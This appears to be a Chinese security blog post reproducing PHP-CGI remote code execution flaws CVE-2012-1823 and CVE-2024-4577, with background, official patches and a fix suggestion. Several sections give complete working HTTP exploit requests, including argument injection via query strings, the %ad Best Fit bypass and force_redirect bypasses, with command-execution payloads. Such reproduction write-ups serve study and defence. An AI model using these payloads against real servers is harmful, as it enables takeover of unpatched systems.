<!DOCTYPE html>
<html lang=ch>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="序CGI (Common Gateway Interface),通用网关接口，是web程序于外部应用程序之间传递信息的接口标准。而对于PHP-CGI，则是通过CGI协议运行PHP脚本的方式，将web服务器收到得数据转发给PHP解释器执行，再将PHP解释器执行得结果发送给Web服务器。 PHP-CGI 提供两种交互模式：  CGI模式  这最初始交互方式，Web服务器每次收到请求时，都会请求一个PH">
<meta property="og:type" content="article">
<meta property="og:title" content="php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞">
<meta property="og:url" content="https://q1ng-li.github.io/2026/04/13/blog36/index.html">
<meta property="og:site_name" content="q1ng">
<meta property="og:description" content="序CGI (Common Gateway Interface),通用网关接口，是web程序于外部应用程序之间传递信息的接口标准。而对于PHP-CGI，则是通过CGI协议运行PHP脚本的方式，将web服务器收到得数据转发给PHP解释器执行，再将PHP解释器执行得结果发送给Web服务器。 PHP-CGI 提供两种交互模式：  CGI模式  这最初始交互方式，Web服务器每次收到请求时，都会请求一个PH">
<meta property="og:locale" content="ch_CN">
<meta property="og:image" content="https://q1ng-li.github.io/images/image-20260414165335553.png">
<meta property="og:image" content="https://q1ng-li.github.io/images/image-20260414170601941.png">
<meta property="og:image" content="https://q1ng-li.github.io/images/image-20260414174343596.png">
<meta property="og:image" content="https://q1ng-li.github.io/images/image-20260414181331529.png">
<meta property="article:published_time" content="2026-04-13T11:52:07.000Z">
<meta property="article:modified_time" content="2026-04-14T10:45:18.865Z">
<meta property="article:author" content="q1ng">
<meta property="article:tag" content="cve">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://q1ng-li.github.io/images/image-20260414165335553.png">
    
    
        
          
              <link rel="shortcut icon" href="/images/1.jpg">
          
        
        
          
            <link rel="icon" type="image/png" href="/images/1.jpg" sizes="192x192">
          
        
        
          
            <link rel="apple-touch-icon" sizes="180x180" href="/images/1.jpg">
          
        
    
    <!-- title -->
    <title>php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞</title>
    <!-- styles -->
    
<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/lib/meslo-LG/styles.css">

    
<link rel="stylesheet" href="/lib/justified-gallery/justifiedGallery.min.css">

    
<link rel="stylesheet" href="/css/style.css">

    <!-- rss -->
    
    
    <!-- jquery -->
    
<script src="/lib/jquery/jquery.min.js"></script>

<meta name="generator" content="Hexo 7.3.0"></head>

<body>
    <div class="banner">
<div id="blogtitel" class="blogtitel">q1ng</div>
<ul id="wrapper" class="wrapper">
  <div class="sun">
    <div class="star"></div>
  </div>
  <div class="mercury">
    <div class="planet">
      <div class="shadow"></div>
    </div>
  </div>
  <div class="venus">
    <div class="planet">
      <div class="shadow"></div>
    </div>
  </div>
  <div class="earth">
    <div class="planet"><div class="shadow"></div></div>
  </div>
  <div class="mars">
    <div class="planet"><div class="shadow"></div></div>
  </div>
  <div class="jupiter">
    <div class="planet"><div class="shadow"></div></div>
  </div>
</ul>
</div>

    <div class="background">
      
        <div id="header-post">
  <a id="menu-icon" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#"><i class="fa fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
         
          <li><a href="/home/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/tags">Tags</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="http://github.com/tzvetkov75">Projects</a></li>
        
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" href="/2026/04/13/blog37/"><i class="fa fa-chevron-left" aria-hidden="true" onmouseover='$("#i-prev").toggle();' onmouseout='$("#i-prev").toggle();'></i></a></li>
        
        
        <li><a class="icon" href="/2026/04/11/blog35/"><i class="fa fa-chevron-right" aria-hidden="true" onmouseover='$("#i-next").toggle();' onmouseout='$("#i-next").toggle();'></i></a></li>
        
        <li><a class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa fa-chevron-up" aria-hidden="true" onmouseover='$("#i-top").toggle();' onmouseout='$("#i-top").toggle();'></i></a></li>
        <li><a class="icon" href="#"><i class="fa fa-share-alt" aria-hidden="true" onmouseover='$("#i-share").toggle();' onmouseout='$("#i-share").toggle();' onclick='$("#share").toggle();return false;'></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://q1ng-li.github.io/2026/04/13/blog36/"><i class="fa fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://q1ng-li.github.io/2026/04/13/blog36/&text=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://q1ng-li.github.io/2026/04/13/blog36/&is_video=false&description=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞&body=Check out this article: https://q1ng-li.github.io/2026/04/13/blog36/"><i class="fa fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://q1ng-li.github.io/2026/04/13/blog36/&name=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞&description="><i class="fa fa-tumblr " aria-hidden="true"></i></a></li>
</ul>

    </div>
    <div id="toc">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BA%8F"><span class="toc-number">1.</span> <span class="toc-text">序</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CVE-2012-1823"><span class="toc-number">2.</span> <span class="toc-text">CVE-2012-1823</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#vulhub%E5%A4%8D%E7%8E%B0"><span class="toc-number">2.1.</span> <span class="toc-text">vulhub复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%98%E6%96%B9%E8%A1%A5%E4%B8%81"><span class="toc-number">2.2.</span> <span class="toc-text">官方补丁</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CVE-2024-4577"><span class="toc-number">3.</span> <span class="toc-text">CVE-2024-4577</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0"><span class="toc-number">3.1.</span> <span class="toc-text">复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E4%BB%A5CGI%E6%A8%A1%E5%BC%8F%E8%BF%90%E8%A1%8C%E7%9A%84PHP%E7%8E%AF%E5%A2%83%EF%BC%88%E5%B0%91%E8%A7%81%EF%BC%89"><span class="toc-number">3.1.1.</span> <span class="toc-text">1.以CGI模式运行的PHP环境（少见）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%B0%86PHP-CGi%E6%9A%B4%E9%9C%B2%E5%9C%A8%E5%A4%96"><span class="toc-number">3.1.2.</span> <span class="toc-text">2.将PHP-CGi暴露在外</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D%E6%84%8F%E8%A7%81"><span class="toc-number">3.1.3.</span> <span class="toc-text">修复意见</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%98%E6%96%B9%E8%A1%A5%E4%B8%81-1"><span class="toc-number">3.2.</span> <span class="toc-text">官方补丁</span></a></li></ol></li></ol>
    </div>
  </span>
</div>

      
      <div class="content index width mx-auto px2 my4">
          
          <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle" itemprop="name headline">
        php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞
    </h1>



    <div class="meta">
      <span class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span itemprop="name">q1ng</span>
      </span>
      
    <div class="postdate">
        <time datetime="2026-04-13T11:52:07.000Z" itemprop="datePublished">2026-04-13</time>
    </div>


      
    <div class="article-tag">
        <i class="fa fa-tag"></i>
        <a class="tag-link-link" href="/tags/cve/" rel="tag">cve</a>
    </div>


    </div>
  </header>
  

  <div class="content" itemprop="articleBody">
    <h1 id="序"><a href="#序" class="headerlink" title="序"></a>序</h1><p>CGI (<strong>Common Gateway Interface</strong>),通用网关接口，是web程序于外部应用程序之间传递信息的接口标准。而对于PHP-CGI，则是通过CGI协议运行PHP脚本的方式，将web服务器收到得数据转发给PHP解释器执行，再将PHP解释器执行得结果发送给Web服务器。</p>
<p>PHP-CGI 提供两种交互模式：</p>
<ul>
<li>CGI模式</li>
</ul>
<p>这最初始交互方式，Web服务器每次收到请求时，都会请求一个PHP-CGI进程，处理完请求，将结果返回给Web服务器，最后关闭PHP-CGI进程</p>
<ul>
<li>FastCGI模式</li>
</ul>
<p>CGI方式的改进版，FastCGI可以常驻后台运行，并通过FastCGI协议接受请求，返回执行结果，不会自己退出进程</p>
<h1 id="CVE-2012-1823"><a href="#CVE-2012-1823" class="headerlink" title="CVE-2012-1823"></a>CVE-2012-1823</h1><p>影响范围</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php &lt; 5.3.12<br>php &lt; 5.4.2<br></code></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">$php-cgi.exe -h<br>Usage: php-cgi [-q] [-h] [-s] [-v] [-i] [-f &lt;file&gt;]<br>       php-cgi &lt;file&gt; [args...]<br>  -a               Run interactively<br>  -b &lt;address:port&gt;|&lt;port&gt; Bind Path for external FASTCGI Server mode // 以交互模式运行。<br>  -C               Do not chdir to the script directory             // 为外部FASTCGI服务器模式绑定路径。<br>  -c &lt;path&gt;|&lt;file&gt; Look for php.ini file in this directory            // 在指定目录或文件中查找 php.ini 配置文件。<br>  -n               No php.ini file will be used                       // 不使用任何 php.ini 文件。<br>  -d foo[=bar]     Define INI entry foo with value &#x27;bar&#x27;              // 定义INI条目 foo 并设置其值为 &#x27;bar&#x27;。<br>  -e               Generate extended information for debugger/profiler// 为调试器/分析器生成扩展信息。<br>  -f &lt;file&gt;        Parse &lt;file&gt;.  Implies &#x27;-q&#x27;                       //  解析指定的 &lt;file&gt;。隐含 -q 选项。<br>  -h               This help                                          // 显示帮助信息。<br>  -i               PHP information                                    // 显示PHP信息。<br>  -l               Syntax check only (lint)                           // 仅进行语法检查（lint）。<br>  -m               Show compiled in modules                           // 显示编译进PHP的模块。<br>  -q               Quiet-mode.  Suppress HTTP Header output.          // 静默模式。抑制HTTP头输出。<br>  -s               Display colour syntax highlighted source.          // 显示带有颜色语法高亮的源代码。<br>  -v               Version number                                     // 显示版本号。<br>  -w               Display source with stripped comments and whitespace.//显示剥离了注释和空白的源代码。<br>  -z &lt;file&gt;        Load Zend extension &lt;file&gt;.                         // 加载Zend扩展 &lt;file&gt;。<br>  -T &lt;count&gt;       Measure execution time of script repeated &lt;count&gt;times.//测量脚本重复 &lt;count&gt; 次的执行时间。<br></code></pre></td></tr></table></figure>

<p>-s 可以泄露源码；-d 可以修改指定配置项</p>
<h2 id="vulhub复现"><a href="#vulhub复现" class="headerlink" title="vulhub复现"></a>vulhub复现</h2><p>php:5.4.1-cgi</p>
<p>服务器启用了PHP-CGI处理请求（Serve API  CGI&#x2F;FastCGI ），收到如下请求</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">http://example.com/index.php?-s<br></code></pre></td></tr></table></figure>

<p>那么该请求就会被解析为PHP-CGI命令执行,显示源码：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">php-cgi.exe index.php -s<br></code></pre></td></tr></table></figure>

<p>-d命令危害更大，可以修改指定配置</p>
<ul>
<li><p><code>allow_url_include</code>: 允许包含远程机器的文件</p>
</li>
<li><p><code>auto_prepend_file</code>:  在每个PHP文件执行之前，自动包含（include）指定的文件</p>
</li>
</ul>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input HTTP/1.1<br>Host: 103.218.242.206:3000<br>Content-Length: 18<br>Content-Type: application/x-www-form-urlencoded<br><br>&lt;?php phpinfo();?&gt;<br></code></pre></td></tr></table></figure>

<p><img src="/./images/image-20260414165335553.png" alt="image-20260414165335553"></p>
<p>也可以命令执行</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp://input HTTP/1.1<br>Host: 103.218.242.206:3000<br>Content-Length: 18<br>Content-Type: application/x-www-form-urlencoded<br><br>&lt;?php echo `id`;?&gt;<br>&lt;?php echo exec(&#x27;ls&#x27;);?&gt;<br>&lt;?php system(&#x27;ls&#x27;);?&gt;<br></code></pre></td></tr></table></figure>

<p>这个漏洞发生在 PHP-CGI 解析 HTTP 请求的 query string.如果 query string 中包含了 PHP-CGI 的配置指令，这些指令可能会被错误地解释和执行</p>
<h2 id="官方补丁"><a href="#官方补丁" class="headerlink" title="官方补丁"></a>官方补丁</h2><p><img src="/./images/image-20260414170601941.png" alt="image-20260414170601941"></p>
<p>可以看到主要是判断url_decode后是否存在 ‘-‘ 字符</p>
<h1 id="CVE-2024-4577"><a href="#CVE-2024-4577" class="headerlink" title="CVE-2024-4577"></a>CVE-2024-4577</h1><p>字符编码的Best Fit特性</p>
<p>可以看到官方补丁只是对  “-“ 符号进行检测，忽略了Windows平台的字符编码转换的Best Fit特性</p>
<p>PHP受影响版本：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">- PHP8.3 &lt; 8.3.8<br>- PHP8.2 &lt; 8.2.20<br>- PHP8.1 &lt; 8.1.29<br></code></pre></td></tr></table></figure>

<h2 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">chcp<br>活动代码页: 936<br></code></pre></td></tr></table></figure>



<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">windows 11 简体中文(字码页 936)<br>XAMPP 8.2.12 / PHP 8.2.12<br></code></pre></td></tr></table></figure>

<p>打开apache的httpd-xampp.conf配置文件,找到以下内容取消注释，即可使用GI模式运行的PHP</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">#&lt;FilesMatch &quot;\.php$&quot;&gt;<br>#    SetHandler application/x-httpd-php-cgi<br>#&lt;/FilesMatch&gt;<br>#&lt;IfModule actions_module&gt;<br>#    Action application/x-httpd-php-cgi &quot;/php-cgi/php-cgi.exe&quot;<br>#&lt;/IfModule&gt;<br></code></pre></td></tr></table></figure>

<p><img src="/./images/image-20260414174343596.png" alt="image-20260414174343596"></p>
<p>点击apache的start启动web服务</p>
<p>由Windows平台的字符编码转换的Best Fit特性可知，传入的<code>%ad</code>，会被转换为<code>-</code></p>
<p><em>在我的  gbk_bestfit_mappings.json 中有 Best Fit转换表</em></p>
<h3 id="1-以CGI模式运行的PHP环境（少见）"><a href="#1-以CGI模式运行的PHP环境（少见）" class="headerlink" title="1.以CGI模式运行的PHP环境（少见）"></a>1.以CGI模式运行的PHP环境（少见）</h3><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">POST /index.php?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp://input HTTP/1.1<br>Host: 172.28.37.91<br>Content-Type: application/x-www-form-urlencoded<br>Content-Length: 22<br><br>&lt;?php phpinfo();?&gt;<br></code></pre></td></tr></table></figure>

<h3 id="2-将PHP-CGi暴露在外"><a href="#2-将PHP-CGi暴露在外" class="headerlink" title="2.将PHP-CGi暴露在外"></a>2.将PHP-CGi暴露在外</h3><p>将PHP的执行程序直接暴露在web目录里</p>
<p>我们可以在xampp的http-xampp.conf文件中可以看到</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">ScriptAlias /php-cgi/ &quot;D:/xampp/php/&quot;<br>&lt;Directory &quot;D:/xampp/php&quot;&gt;<br>    AllowOverride None<br>    Options None<br>    Require all denied<br>    &lt;Files &quot;php-cgi.exe&quot;&gt;<br>          Require all granted<br>    &lt;/Files&gt;<br>&lt;/Directory&gt;<br></code></pre></td></tr></table></figure>

<p>这段配置是将url<code>/php-cgi/</code>映射到<code>D:/xmapp/php/</code>中，并限制只能访问<code>D:/xmapp/php/</code>中的<code>php-cgi.exe</code></p>
<p>当我们直接访问 &#x2F;php-cgi&#x2F;php-cgi.exe  会报错500。原因在php.ini中添加了一个新的配置项<strong>cgi.force_redirect</strong>，这是php的一个自我保护机制，该设定的默认值为<strong>cgi.force_redirect&#x3D;1</strong>，表示只有经过重定向的请求才可以执行，不能够由请求直接执行</p>
<p><img src="/./images/image-20260414181331529.png" alt="image-20260414181331529"></p>
<p>其一，我们可以令<code>cgi.force_redirect=0</code>，来访问&#x2F;php-cgi&#x2F;php-cgi.exe</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">POST /php-cgi/php-cgi.exe?%add+cgi.force_redirect%3d0+%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1<br>Host: host<br>Connection: close<br>Content-Length: 20<br><br><br>&lt;?php phpinfo();?&gt;<br></code></pre></td></tr></table></figure>

<p>其二，REDIRECT_STATUS请求头设置</p>
<p>看到相关源码 <code>[php-src/sapi/cgi/cgi_main.c at 51379d66ec8732e506c43f6c7f1befc500117ae8 · php/php-src · GitHub](https://github.com/php/php-src/blob/51379d66ec8732e506c43f6c7f1befc500117ae8/sapi/cgi/cgi_main.c#L1904)</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">if (cgi &amp;&amp; CGIG(force_redirect)) &#123;<br>		/* Apache will generate REDIRECT_STATUS,<br>		 * Netscape and redirect.so will generate HTTP_REDIRECT_STATUS.<br>		 * redirect.so and installation instructions available from<br>		 * http://www.koehntopp.de/php.<br>		 *   -- kk@netuse.de<br>		 */<br>		if (!getenv(&quot;REDIRECT_STATUS&quot;) &amp;&amp;<br>			!getenv (&quot;HTTP_REDIRECT_STATUS&quot;) &amp;&amp;<br>			/* this is to allow a different env var to be configured<br>			 * in case some server does something different than above */<br>			(!CGIG(redirect_status_env) || !getenv(CGIG(redirect_status_env)))<br>		) &#123;<br>			zend_try &#123;<br>				SG(sapi_headers).http_response_code = 400;<br>	...<br>			&#125; zend_catch &#123;<br>			&#125; zend_end_try();<br>#if defined(ZTS) &amp;&amp; !defined(PHP_DEBUG)<br>			/* XXX we&#x27;re crashing here in msvc6 debug builds at<br>			 * php_message_handler_for_zend:839 because<br>			 * SG(request_info).path_translated is an invalid pointer.<br>			 * It still happens even though I set it to null, so something<br>			 * weird is going on.<br>			 */<br>			tsrm_shutdown();<br>#endif<br>			free(bindpath);<br>			return FAILURE;<br>		&#125;<br>	&#125;<br></code></pre></td></tr></table></figure>

<p>看到条件判断 ，如果没有redirect_status或者web服务器重定向，就无法访问&#x2F;php-cgi&#x2F;php-cgi.exe</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">if (!getenv(&quot;REDIRECT_STATUS&quot;) &amp;&amp;           <br>    !getenv(&quot;HTTP_REDIRECT_STATUS&quot;) &amp;&amp;       <br>    (!CGIG(redirect_status_env) ||            <br>     !getenv(CGIG(redirect_status_env))) <br></code></pre></td></tr></table></figure>

<p>因此我们可以抓包后手动增加redirect_status头</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs plaintext">POST /php-cgi/php-cgi.exe?%add+allow_url_include%3don+%add+auto_prepend_file%3dphp%3a//input HTTP/1.1<br>Host: host<br>Connection: close<br>Content-Length: 20<br>REDIRECT-STATUS: 1<br><br>&lt;?php phpinfo();?&gt;<br></code></pre></td></tr></table></figure>

<h3 id="修复意见"><a href="#修复意见" class="headerlink" title="修复意见"></a>修复意见</h3><p>注释  ScriptAlias &#x2F;php-cgi&#x2F; “D:&#x2F;xampp&#x2F;php&#x2F;“   url路径映射</p>
<h2 id="官方补丁-1"><a href="#官方补丁-1" class="headerlink" title="官方补丁"></a>官方补丁</h2><p>添加了对0x80以上的字符进行了限制，避免因Windows平台的字符编码转换的Best Fit特性导致远程代码执行</p>

  </div>
</article>



      </div>
      
       <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/home/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/tags">Tags</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a target="_blank" rel="noopener" href="http://github.com/tzvetkov75">Projects</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%BA%8F"><span class="toc-number">1.</span> <span class="toc-text">序</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CVE-2012-1823"><span class="toc-number">2.</span> <span class="toc-text">CVE-2012-1823</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#vulhub%E5%A4%8D%E7%8E%B0"><span class="toc-number">2.1.</span> <span class="toc-text">vulhub复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%98%E6%96%B9%E8%A1%A5%E4%B8%81"><span class="toc-number">2.2.</span> <span class="toc-text">官方补丁</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#CVE-2024-4577"><span class="toc-number">3.</span> <span class="toc-text">CVE-2024-4577</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A4%8D%E7%8E%B0"><span class="toc-number">3.1.</span> <span class="toc-text">复现</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E4%BB%A5CGI%E6%A8%A1%E5%BC%8F%E8%BF%90%E8%A1%8C%E7%9A%84PHP%E7%8E%AF%E5%A2%83%EF%BC%88%E5%B0%91%E8%A7%81%EF%BC%89"><span class="toc-number">3.1.1.</span> <span class="toc-text">1.以CGI模式运行的PHP环境（少见）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%B0%86PHP-CGi%E6%9A%B4%E9%9C%B2%E5%9C%A8%E5%A4%96"><span class="toc-number">3.1.2.</span> <span class="toc-text">2.将PHP-CGi暴露在外</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%AE%E5%A4%8D%E6%84%8F%E8%A7%81"><span class="toc-number">3.1.3.</span> <span class="toc-text">修复意见</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%AE%98%E6%96%B9%E8%A1%A5%E4%B8%81-1"><span class="toc-number">3.2.</span> <span class="toc-text">官方补丁</span></a></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://q1ng-li.github.io/2026/04/13/blog36/"><i class="fa fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://q1ng-li.github.io/2026/04/13/blog36/&text=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://q1ng-li.github.io/2026/04/13/blog36/&title=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://q1ng-li.github.io/2026/04/13/blog36/&is_video=false&description=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞"><i class="fa fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=php-cgi (CVE-2012-1823 | CVE-2024-4577) 远程代码执行漏洞&body=Check out this article: https://q1ng-li.github.io/2026/04/13/blog36/"><i class="fa fa-envelope fa-lg" aria-hidden="true"></i></a></li>
